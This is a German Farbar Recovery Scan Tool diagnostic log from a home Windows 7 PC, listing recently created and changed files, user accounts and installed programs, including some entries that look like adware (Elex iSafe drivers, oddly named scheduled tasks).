2017-05-10 15:56 - 2017-04-12 17:25 - 00145920 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptsvc.dll
2017-05-10 15:56 - 2017-04-12 17:25 - 00106496 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptnet.dll
2017-05-10 15:56 - 2017-04-07 17:34 - 00986856 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dxgkrnl.sys
2017-05-10 15:56 - 2017-04-07 17:34 - 00265448 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dxgmms1.sys
2017-05-10 15:56 - 2017-04-07 17:30 - 00405504 _____ (Microsoft Corporation) C:\Windows\system32\gdi32.dll
2017-05-10 15:56 - 2017-04-07 17:30 - 00144384 _____ (Microsoft Corporation) C:\Windows\system32\cdd.dll
2017-05-10 15:56 - 2017-04-07 17:22 - 00312832 _____ (Microsoft Corporation) C:\Windows\SysWOW64\gdi32.dll
2017-05-10 15:56 - 2017-04-05 16:55 - 00460800 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\srv.sys
2017-05-10 15:56 - 2017-04-05 16:55 - 00405504 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\srv2.sys
2017-05-10 15:56 - 2017-04-05 16:55 - 00168960 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\srvnet.sys
2017-05-10 15:56 - 2017-04-04 17:34 - 01895656 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tcpip.sys
2017-05-10 15:56 - 2017-04-04 17:34 - 00377576 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\netio.sys
2017-05-10 15:56 - 2017-04-04 17:34 - 00287976 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\FWPKCLNT.SYS
2017-05-10 15:56 - 2017-04-04 16:53 - 00496128 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\afd.sys
2017-05-10 15:56 - 2017-04-04 16:53 - 00117760 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tdx.sys
2017-05-10 15:56 - 2017-03-10 18:32 - 01389056 _____ (Microsoft Corporation) C:\Windows\system32\pla.dll
2017-05-10 15:56 - 2017-03-10 18:32 - 00300544 _____ (Microsoft Corporation) C:\Windows\system32\pdh.dll
2017-05-10 15:56 - 2017-03-10 18:20 - 01508352 _____ (Microsoft Corporation) C:\Windows\SysWOW64\pla.dll
2017-05-10 15:56 - 2017-03-10 18:20 - 00237056 _____ (Microsoft Corporation) C:\Windows\SysWOW64\pdh.dll
2017-05-10 15:56 - 2017-03-10 17:57 - 00009216 _____ (Microsoft Corporation) C:\Windows\system32\plasrv.exe
2017-05-10 15:56 - 2017-03-10 17:55 - 00205312 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\fastfat.sys
2017-05-10 15:56 - 2017-03-10 17:55 - 00195584 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\exfat.sys
2017-05-10 15:56 - 2017-03-09 18:34 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\tzres.dll
2017-05-10 15:56 - 2017-03-09 18:19 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tzres.dll
2017-05-03 14:36 - 2017-05-03 14:36 - 00000000 ____D C:\Program Files (x86)\IIS
2017-05-03 14:35 - 2017-05-05 20:46 - 00000000 ____D C:\Program Files (x86)\Firefox
2017-05-03 14:35 - 2017-05-03 14:35 - 00000000 _____ C:\Windows\SysWOW64\1111111
2017-05-02 20:00 - 2017-05-02 20:00 - 00016284 _____ C:\Users\Markus\Kontoauszug_452408880300_2017-04-29_0730.pdf
2017-05-01 09:36 - 2009-06-10 23:00 - 00000824 _____ C:\Windows\system32\Drivers\etc\hosts.20170501-093603.backup
2017-04-29 16:43 - 2017-04-29 16:43 - 00001059 _____ C:\Users\Markus\Desktop\Eusing Free Registry Cleaner.lnk
2017-04-29 16:43 - 2017-04-29 16:43 - 00000000 ____D C:\Users\Markus\AppData\Roaming\Eusing
2017-04-29 16:43 - 2017-04-29 16:43 - 00000000 ____D C:\Program Files (x86)\Eusing Free Registry Cleaner
2017-04-29 16:42 - 2017-04-29 16:42 - 00985017 _____ C:\Users\Markus\Downloads\EFRCSetup_4.0.exe
2017-04-28 14:29 - 2017-05-17 14:18 - 00000000 ____D C:\Users\Public\Documents\Google
2017-04-28 14:29 - 2017-04-28 14:29 - 00000000 ____D C:\Users\Markus\AppData\Roaming\Firefox
2017-04-28 14:29 - 2017-04-28 14:29 - 00000000 ____D C:\Users\Markus\AppData\Local\Firefox
2017-04-27 19:44 - 2017-05-20 17:33 - 00000000 ____D C:\Users\Markus\AppData\LocalLow\Mozilla
2017-04-27 19:39 - 2017-04-27 19:49 - 00000000 ____D C:\Users\Markus\AppData\Local\Mozilla
2017-04-27 19:39 - 2017-04-27 19:44 - 00000000 ____D C:\Users\Markus\AppData\Roaming\Mozilla
2017-04-27 19:38 - 2017-05-03 14:36 - 00002006 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
2017-04-27 19:38 - 2017-05-03 14:36 - 00001936 _____ C:\Users\Public\Desktop\Mozilla Firefox.lnk
2017-04-27 19:38 - 2017-04-27 19:38 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2017-04-27 17:42 - 2017-04-27 17:42 - 00000000 ____D C:\Users\Markus\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Bluetooth-Geräte
2017-04-27 16:44 - 2017-04-27 16:44 - 00000000 _____ C:\Windows\system32\__00000001400ACBF1__C0000005.dmp
2017-04-27 16:28 - 2017-04-27 16:28 - 00000000 ____D C:\Windows\system32\SSL
2017-04-27 16:28 - 2017-04-27 16:28 - 00000000 _____ C:\Windows\system32\__000000013FF6CBF1__C0000005.dmp
2017-04-26 19:27 - 2017-05-16 23:02 - 00000000 ____D C:\Users\Markus\AppData\Local\inst
2017-04-23 22:46 - 2017-04-23 22:46 - 00000000 ____D C:\Users\Markus\AppData\Local\{6C9E99E8-29C3-4435-A0EF-079701803673}
2017-04-23 13:28 - 2017-05-20 17:27 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2017-04-22 20:23 - 2017-04-22 20:23 - 01313544 _____ C:\Users\Alina\ElsterDruck_2.pdf
2017-04-22 20:06 - 2017-04-22 20:06 - 00522429 _____ C:\Users\Alina\Anmeldung Jg 5 GBE2.pdf
2017-04-22 18:27 - 2017-04-22 18:27 - 00000000 ____D C:\Users\Markus\AppData\Local\{140B0B5C-A1F5-4808-AD0D-2A1D5A214132}
2017-04-22 18:05 - 2017-04-22 18:05 - 00000005 _____ C:\Windows\SysWOW64\lMMLDeleteUserData42107612FX.tmp
2017-04-22 17:53 - 2017-04-22 17:53 - 00000000 ____D C:\Users\Markus\AppData\Local\{A5B0ABC6-5859-46DB-B69D-5F36B7D7E8EC}
2017-04-22 11:16 - 2009-06-10 23:00 - 00000824 _____ C:\Windows\system32\Drivers\etc\hosts.20170422-111654.backup
2017-04-22 11:09 - 2017-04-22 11:09 - 00000000 ____D C:\Users\Markus\Documents\HTC
2017-04-21 16:43 - 2009-06-10 23:00 - 00000824 _____ C:\Windows\system32\Drivers\etc\hosts.20170421-164340.backup
2017-04-21 11:29 - 2017-05-19 16:08 - 00000000 _____ C:\Users\Public\Documents\temp.dat
2017-04-21 11:29 - 2017-05-17 14:17 - 00000000 _____ C:\Users\Public\Documents\report.dat
2017-04-21 11:29 - 2017-05-03 14:34 - 00000000 _____ C:\Windows\SysWOW64\11
2017-04-21 11:29 - 2017-04-21 11:29 - 00000000 ____D C:\Windows\system32\log
2017-04-21 11:29 - 2017-04-21 11:29 - 00000000 _____ C:\Windows\SysWOW64\22
2017-04-21 11:29 - 2016-05-23 04:41 - 00055056 _____ (Elex do Brasil Participações Ltda) C:\Windows\system32\Drivers\iSafeKrnlBoot.sys
2017-04-21 11:29 - 2016-05-19 08:42 - 00052392 _____ (Elex do Brasil Participações Ltda) C:\Windows\system32\Drivers\iSafeNetFilter.sys
2017-04-21 09:52 - 2017-04-21 09:52 - 00000000 ____D C:\Users\Markus\AppData\Local\{D1FF043E-E888-4F8C-890F-409848E25675}
2017-04-21 07:25 - 2017-04-21 07:25 - 00000000 ____D C:\Windows\Update
2017-04-21 07:25 - 2017-04-21 07:25 - 00000000 _____ C:\Windows\SysWOW64\44
2017-04-20 17:42 - 2017-04-20 17:42 - 00006094 _____ C:\Windows\System32\Tasks\Jujalyclartion Launcher
2017-04-20 17:42 - 2017-04-20 17:42 - 00006030 _____ C:\Windows\System32\Tasks\Plirisy

==================== Ein Monat: Geänderte Dateien und Ordner ========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2017-05-20 17:34 - 2009-07-14 06:45 - 00031536 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2017-05-20 17:34 - 2009-07-14 06:45 - 00031536 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2017-05-20 17:33 - 2012-12-09 23:31 - 00000000 ____D C:\Users\Markus\Documents\Outlook-Dateien
2017-05-20 17:31 - 2012-01-06 19:54 - 00699666 _____ C:\Windows\system32\perfh007.dat
2017-05-20 17:31 - 2012-01-06 19:54 - 00149774 _____ C:\Windows\system32\perfc007.dat
2017-05-20 17:31 - 2009-07-14 07:13 - 01620612 _____ C:\Windows\system32\PerfStringBackup.INI
2017-05-20 17:31 - 2009-07-14 05:20 - 00000000 ____D C:\Windows\inf
2017-05-20 17:27 - 2012-11-14 15:17 - 00000000 ____D C:\Users\Markus\AppData\Roaming\Skype
2017-05-20 17:27 - 2012-11-07 06:17 - 00000000 ____D C:\ProgramData\NVIDIA
2017-05-20 17:26 - 2012-12-17 23:10 - 00000000 ____D C:\Program Files (x86)\Spybot - Search & Destroy 2
2017-05-20 17:16 - 2015-06-29 19:27 - 00000000 ____D C:\Users\Markus\Kontoauszuege
2017-05-20 17:16 - 2012-11-07 10:08 - 00000000 ____D C:\Users\Markus
2017-05-20 11:55 - 2013-12-01 12:45 - 00000000 ____D C:\Program Files\Avira Secure Backup
2017-05-19 16:57 - 2014-02-03 20:32 - 00000000 ____D C:\ProgramData\Package Cache
2017-05-19 16:56 - 2013-12-01 12:45 - 00000000 ____D C:\Users\Markus\AppData\Roaming\Avira
2017-05-19 16:33 - 2015-09-01 07:04 - 00000000 ____D C:\Program Files\Common Files\AV
2017-05-17 21:15 - 2012-12-25 12:58 - 00000000 ____D C:\Users\Markus\AppData\Local\CrashDumps
2017-05-17 14:33 - 2013-08-04 21:34 - 00000000 ____D C:\Windows\system32\appmgmt
2017-05-17 09:19 - 2013-04-06 17:26 - 00000000 ____D C:\Users\Markus\AppData\Local\FreePDF_XP
2017-05-17 08:40 - 2012-11-18 20:44 - 00000000 ____D C:\Users\Markus\Word
2017-05-16 23:02 - 2017-01-04 20:27 - 00000000 ____D C:\Users\Markus\AppData\Local\GeoLocator
2017-05-15 19:51 - 2016-02-03 21:30 - 00000461 _____ C:\Users\Markus\Desktop\Smart Camera.ini
2017-05-13 19:31 - 2012-11-08 21:56 - 00803320 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
2017-05-13 19:31 - 2012-11-08 21:56 - 00144888 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2017-05-13 19:31 - 2012-11-08 21:56 - 00004366 _____ C:\Windows\System32\Tasks\Adobe Flash Player Updater
2017-05-13 19:31 - 2012-11-08 21:55 - 00000000 ____D C:\Windows\SysWOW64\Macromed
2017-05-13 19:31 - 2012-11-08 21:55 - 00000000 ____D C:\Windows\system32\Macromed
2017-05-13 11:56 - 2013-01-12 19:05 - 00000000 ____D C:\Users\Markus\AppData\Local\ElevatedDiagnostics
2017-05-13 11:56 - 2009-07-14 05:20 - 00000000 ____D C:\Windows\system32\NDF
2017-05-12 19:33 - 2009-07-14 05:20 - 00000000 ____D C:\Windows\rescache
2017-05-12 17:55 - 2009-07-14 06:45 - 00423960 _____ C:\Windows\system32\FNTCACHE.DAT
2017-05-12 17:54 - 2009-07-14 05:20 - 00000000 ____D C:\Windows\PolicyDefinitions
2017-05-12 17:37 - 2012-01-26 23:54 - 01594892 _____ C:\Windows\SysWOW64\PerfStringBackup.INI
2017-05-12 17:35 - 2013-08-15 22:57 - 00000000 ____D C:\Windows\system32\MRT
2017-05-12 17:35 - 2012-11-11 18:05 - 156335152 ____C (Microsoft Corporation) C:\Windows\system32\MRT.exe
2017-05-08 21:06 - 2014-12-26 19:13 - 00004476 _____ C:\Windows\System32\Tasks\Adobe Acrobat Update Task
2017-05-07 09:39 - 2012-11-07 10:10 - 00000000 ____D C:\Windows\System32\Tasks\Fujitsu
2017-05-02 20:05 - 2015-09-13 10:32 - 00000000 ____D C:\Users\Alina\Kontoauszug
2017-05-02 20:04 - 2015-01-18 20:27 - 00000000 ____D C:\Users\Alina
2017-05-02 20:01 - 2015-10-01 18:25 - 00000000 ____D C:\Users\Paul\Kontoauszuege
2017-05-02 20:01 - 2015-10-01 18:25 - 00000000 ____D C:\Users\Paul
2017-05-01 19:59 - 2013-09-29 11:20 - 00000000 ____D C:\Program Files\PDFCreator
2017-05-01 19:58 - 2012-12-14 22:06 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Lexware
2017-05-01 17:52 - 2016-03-03 14:22 - 00000000 ____D C:\Users\Markus\AppData\Roaming\Mp3tag
2017-05-01 17:40 - 2013-09-03 19:51 - 01567232 ___SH C:\Users\Markus\Downloads\Thumbs.db
2017-05-01 09:33 - 2012-11-18 20:43 - 00000000 ____D C:\Users\Markus\Haus
2017-04-30 18:00 - 2013-10-29 15:43 - 00000000 ____D C:\Users\Markus\AppData\Local\CUSTPDF Writer
2017-04-30 18:00 - 2012-11-18 20:43 - 00000000 ____D C:\Users\Markus\Power Point
2017-04-29 17:18 - 2012-11-07 10:08 - 00003542 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA
2017-04-29 17:18 - 2012-11-07 10:08 - 00003414 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore
2017-04-27 19:29 - 2016-12-25 23:26 - 00000000 ____D C:\Users\Markus\AppData\Roaming\Browsers
2017-04-27 19:19 - 2012-11-08 15:03 - 00000000 ____D C:\Users\Markus\AppData\Local\Google
2017-04-26 19:27 - 2016-12-25 23:26 - 00000000 ____D C:\ProgramData\vCore
2017-04-23 16:36 - 2014-09-28 19:14 - 00011142 _____ C:\Users\Alina\Alina3.xlsx
2017-04-22 19:57 - 2012-11-18 20:43 - 00000000 ____D C:\Users\Markus\Papiere
2017-04-22 10:20 - 2017-01-15 16:10 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Solveig Multimedia
2017-04-22 10:20 - 2017-01-15 16:09 - 00000000 ____D C:\Program Files (x86)\Solveig Multimedia
2017-04-22 10:06 - 2012-11-18 20:43 - 00000000 ____D C:\Users\Markus\Kaufen und Bestellen

==================== Dateien im Wurzelverzeichnis einiger Verzeichnisse =======

2013-09-29 12:20 - 2013-12-01 11:20 - 0000093 _____ () C:\Users\Markus\AppData\Roaming\WB.CFG
2013-09-29 12:20 - 2013-12-01 11:20 - 0000006 _____ () C:\Users\Markus\AppData\Roaming\WBPU-TTL.DAT
2012-11-27 22:00 - 2012-11-27 22:00 - 0003584 _____ () C:\Users\Markus\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2016-01-30 21:00 - 2016-01-30 21:00 - 0003339 _____ () C:\Users\Markus\AppData\Local\recently-used.xbel
2013-04-06 17:15 - 2013-04-06 17:15 - 0000057 _____ () C:\ProgramData\Ament.ini

==================== Bamital & volsnap ======================

(Es ist kein automatischer Fix für Dateien vorhanden, die an der Verifikation gescheitert sind.)

C:\Windows\system32\winlogon.exe => Datei ist digital signiert
C:\Windows\system32\wininit.exe => Datei ist digital signiert
C:\Windows\SysWOW64\wininit.exe => Datei ist digital signiert
C:\Windows\explorer.exe => Datei ist digital signiert
C:\Windows\SysWOW64\explorer.exe => Datei ist digital signiert
C:\Windows\system32\svchost.exe => Datei ist digital signiert
C:\Windows\SysWOW64\svchost.exe => Datei ist digital signiert
C:\Windows\system32\services.exe => Datei ist digital signiert
C:\Windows\system32\User32.dll => Datei ist digital signiert
C:\Windows\SysWOW64\User32.dll => Datei ist digital signiert
C:\Windows\system32\userinit.exe => Datei ist digital signiert
C:\Windows\SysWOW64\userinit.exe => Datei ist digital signiert
C:\Windows\system32\rpcss.dll => Datei ist digital signiert
C:\Windows\system32\dnsapi.dll => Datei ist digital signiert
C:\Windows\SysWOW64\dnsapi.dll => Datei ist digital signiert
C:\Windows\system32\Drivers\volsnap.sys => Datei ist digital signiert



Addition:

Zusätzliches Untersuchungsergebnis von Farbar Recovery Scan Tool (x64) Version: 20-05-2017
durchgeführt von Markus (20-05-2017 17:39:57)
Gestartet von C:\Users\Markus\Desktop
Windows 7 Professional Service Pack 1 (X64) (2012-11-07 08:08:14)
Start-Modus: Normal
==========================================================


==================== Konten: =============================

Administrator (S-1-5-21-3526156030-524322557-4044303751-500 - Administrator - Disabled)
Gast (S-1-5-21-3526156030-524322557-4044303751-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-3526156030-524322557-4044303751-1003 - Limited - Enabled)
Markus (S-1-5-21-3526156030-524322557-4044303751-1001 - Administrator - Enabled) => C:\Users\Markus

==================== Sicherheits-Center ========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)

AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installierte Programme ======================

(Nur Adware-Programme mit dem Zusatz "Hidden" können in die Fixlist aufgenommen werden, um sie sichtbar zu machen. Die Adware-Programme sollten manuell deinstalliert werden.)

64 Bit HP CIO Components Installer (Version: 8.2.4 - Hewlett-Packard) Hidden
AAVUpdateManager (HKLM-x32\...\{AFA42FE1-A5C3-485F-9180-BFCF5BF1F1C3}) (Version: 18.00.0000 - Wolters Kluwer Deutschland GmbH)
Adobe Acrobat Reader DC - Deutsch (HKLM-x32\...\{AC76BA86-7AD7-1031-7B44-AC0F074E4100}) (Version: 17.009.20044 - Adobe Systems Incorporated)
Adobe Flash Player 25 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 25.0.0.171 - Adobe Systems Incorporated)
Adobe Flash Player 25 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 25.0.0.171 - Adobe Systems Incorporated)
CANON iMAGE GATEWAY MyCamera Download Plugin (HKLM-x32\...\MyCamera Download Plugin) (Version: 3.1.0.1 - Canon Inc.)
CANON iMAGE GATEWAY Task for ZoomBrowser EX (HKLM-x32\...\CANON iMAGE GATEWAY Task) (Version: 1.8.0.1 - Canon Inc.)
Canon Internet Library for ZoomBrowser EX (HKLM-x32\...\Canon Internet Library for ZoomBrowser EX) (Version: 1.7.0.1 - Canon Inc.)
Canon MOV Decoder (HKLM-x32\...\Canon MOV Decoder) (Version: 1.7.0.6 - Canon Inc.)
Canon MOV Encoder (HKLM-x32\...\Canon MOV Encoder) (Version: 1.5.0.3 - Canon Inc.)
Canon MovieEdit Task for ZoomBrowser EX (HKLM-x32\...\MovieEditTask) (Version: 3.6.0.5 - Canon Inc.)
Canon RAW Codec (HKLM-x32\...\Canon RAW Codec) (Version: 1.8.0.68 - Canon Inc.)
Canon Utilities Digital Photo Professional 3.9 (HKLM-x32\...\DPP) (Version: 3.9.1.0 - Canon Inc.)
Canon Utilities EOS Utility (HKLM-x32\...\EOS Utility) (Version: 2.9.0.0 - Canon Inc.)
Canon Utilities PhotoStitch (HKLM-x32\...\PhotoStitch) (Version: 3.1.22.46 - Canon Inc.)
Canon Utilities Picture Style Editor (HKLM-x32\...\Picture Style Editor) (Version: 1.8.0.0 - Canon Inc.)
Canon Utilities WFT Utility (HKLM-x32\...\WFTK) (Version: 3.5.1.1 - Canon Inc.)
Canon Utilities ZoomBrowser EX (HKLM-x32\...\ZoomBrowser EX) (Version: 6.6.0.23 - Canon Inc.)
Canon ZoomBrowser EX Memory Card Utility (HKLM-x32\...\ZoomBrowser EX Memory Card Utility) (Version: 1.4.0.4 - Canon Inc.)
Control ActiveX de Windows Live Mesh para conexiones remotas (HKLM-x32\...\{04668DF2-D32F-4555-9C7E-35523DCD6544}) (Version: 15.4.5722.2 - Microsoft Corporation)
Contrôle ActiveX Windows Live Mesh pour connexions à distance (HKLM-x32\...\{55D003F4-9599-44BF-BA9E-95D060730DD3}) (Version: 15.4.5722.2 - Microsoft Corporation)
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
EDEKA Foto (HKLM-x32\...\EDEKA Foto) (Version: 5.1.6 - CEWE Stiftung u Co. KGaA)
Eusing Free Registry Cleaner (HKLM-x32\...\Eusing Free Registry Cleaner) (Version:  - Eusing Software)
FJ Camera (HKLM-x32\...\{399C37FB-08AF-493B-BFED-20FBD85EDF7F}) (Version: 5.8.52032.0_WHQL - Sonix)
FreePDF (Remove only) (HKLM-x32\...\FreePDF_XP) (Version:  - )
Fujitsu Hotkey Utility (HKLM-x32\...\InstallShield_{C8E4B31D-337C-483D-822D-16F11441669B}) (Version: 3.70.0.0 - FUJITSU LIMITED)
Fujitsu Hotkey Utility (x32 Version: 3.70.0.0 - FUJITSU LIMITED) Hidden
Fujitsu MobilityCenter Extension Utility (HKLM-x32\...\InstallShield_{EC314CDF-3521-482B-A21C-65AC95664814}) (Version: 3.01.00.002 - FUJITSU LIMITED)
Fujitsu MobilityCenter Extension Utility (Version: 3.01.00.002 - FUJITSU LIMITED) Hidden
Fujitsu System Extension Utility (HKLM-x32\...\InstallShield_{E8A5B78F-4456-4511-AB3D-E7BFFB974A7A}) (Version: 3.4.4.0 - FUJITSU LIMITED)
Fujitsu System Extension Utility (Version: 3.4.4.0 - FUJITSU LIMITED) Hidden
Galería fotográfica de Windows Live (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Galerie de photos Windows Live (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Google Earth (HKLM-x32\...\{F6430171-B86B-4639-839E-374913E7911D}) (Version: 7.1.8.3036 - Google)
Google Update Helper (x32 Version: 1.3.33.5 - Google Inc.) Hidden
GPL Ghostscript (HKLM-x32\...\GPL Ghostscript 9.04) (Version: 9.04 - Artifex Software Inc.)
High-Definition Video Playback (x32 Version: 7.1.13900.47.0 - Nero AG) Hidden
HP FWUpdateEDO2 (HKLM-x32\...\{415FA9AD-DA10-4ABE-97B6-5051D4795C90}) (Version: 1.2.0.0 - Hewlett-Packard)
HP LaserJet 200 color MFP M276 (HKLM-x32\...\{CC38C23C-7824-4DBB-AC73-997CD0BBFEC7}) (Version: 5.0.12201.1116 - Hewlett-Packard)
HP Photo Creations (HKLM-x32\...\HP Photo Creations) (Version: 1.0.0.9572 - HP)
hpbDSService (x32 Version: 002.002.07399 - Hewlett-Packard) Hidden
hpbM276DSService (x32 Version: 001.001.05874 - Hewlett-Packard) Hidden
HPDiagnosticAlert (x32 Version: 1.00.0001 - Microsoft) Hidden
HPDXP (x32 Version: 3.0.26.8 - HP) Hidden
HPLaserJet200color-MFPM276_HelpLearnCenter_SI (HKLM-x32\...\{0F044C7A-6EE1-4F03-90AC-329AAF2FCF12}) (Version: 1.01.0000 - Hewlett-Packard)
HPLJDXPHelper (x32 Version: 020.021.004 - HP) Hidden
HPLJUTCore (x32 Version: 004.005.0001 - HP) Hidden
HPLJUTM276 (x32 Version: 3.00.0003 - HP) Hidden
hppFaxDrvM276 (x32 Version: 003.000.00002 - Hewlett-Packard) Hidden
hppLaserJetService (x32 Version: 009.027.00856 - Hewlett-Packard) Hidden
hppM276LaserJetService (x32 Version: 001.019.00639 - Hewlett-Packard) Hidden
hppSendFaxM276 (x32 Version: 003.000.00002 - Hewlett-Packard) Hidden
hpStatusAlerts (x32 Version: 050.037.00142 - Hewlett Packard) Hidden
hpStatusAlertsM276 (x32 Version: 050.034.00131 - Hewlett-Packard) Hidden
Intel(R) Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 8.0.0.1351 - Intel Corporation)
Intel(R) OpenCL CPU Runtime (HKLM-x32\...\{FCB3772C-B7D0-4933-B1A9-3707EBACC573}) (Version:  - Intel Corporation)
Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 8.15.10.2626 - Intel Corporation)
Intel(R) USB 3.0 eXtensible Host Controller Driver (HKLM-x32\...\{240C3DDD-C5E9-4029-9DF7-95650D040CF2}) (Version: 1.0.3.214 - Intel Corporation)
Intel® PROSet/Wireless WiFi Software (HKLM\...\{DF7756DD-656A-45C3-BA71-74673E8259A9}) (Version: 15.00.0000.0642 - Intel Corporation)
Intel® Trusted Connect Service Client (HKLM\...\{6199B534-A1B6-46ED-873B-97B0ECF8F81E}) (Version: 1.23.216.0 - Intel Corporation)
Junk Mail filter update (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Lexware buchhalter 2014 (x32 Version: 19.02.00.0181 - Haufe-Lexware GmbH & Co.KG) Hidden
Lexware online banking (x32 Version: 20.00.00.0059 - Haufe-Lexware GmbH Co.KG) Hidden
LIFEBOOK Application Panel (HKLM-x32\...\InstallShield_{6226477E-444F-4DFE-BA19-9F4F7D4565BC}) (Version: 8.3.2.0 - FUJITSU LIMITED)
LIFEBOOK Application Panel (Version: 8.3.2.0 - FUJITSU LIMITED) Hidden
LJDXPHelperUI (x32 Version: 020.021.004 - HP) Hidden
Mesh Runtime (x32 Version: 15.4.5722.2 - Microsoft Corporation) Hidden
Microsoft .NET Framework 4.6.1 (Deutsch) (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1031) (Version: 4.6.01055 - Microsoft Corporation)
Microsoft .NET Framework 4.6.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.6.01055 - Microsoft Corporation)
Microsoft ASP.NET MVC 4 Runtime (HKLM-x32\...\{3FE312D5-B862-40CE-8E4E-A6D8ABF62736}) (Version: 4.0.40804.0 - Microsoft Corporation)
Microsoft Office 2010 (HKLM-x32\...\{95140000-0070-0000-0000-0000000FF1CE}) (Version: 14.0.4763.1000 - Microsoft Corporation)
Microsoft Office Professional Plus 2010 (HKLM-x32\...\Office14.PROPLUSR) (Version: 14.0.7015.1000 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft SQL Server 2012 Express LocalDB  (HKLM\...\{E4A1FDA3-689D-44DA-9B39-86BD2270F522}) (Version: 11.2.5058.0 - Microsoft Corporation)
Microsoft SQL Server 2012 Management Objects  (x64) (HKLM\...\{43A5C316-9521-49C3-B9B6-FCE5E1005DF0}) (Version: 11.1.3000.0 - Microsoft Corporation)
Microsoft System CLR Types for SQL Server 2012 (x64) (HKLM\...\{99AC7F47-A4E0-4706-9C65-8948775C2652}) (Version: 11.1.3000.0 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729 (HKLM-x32\...\{6AFCA4E1-9B78-3640-8F72-A7BF33448200}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.21005 (HKLM-x32\...\{90ffcee5-8608-4e94-8c18-a4feb4f83fb8}) (Version: 12.0.21005.1 - Microsoft Corporation)
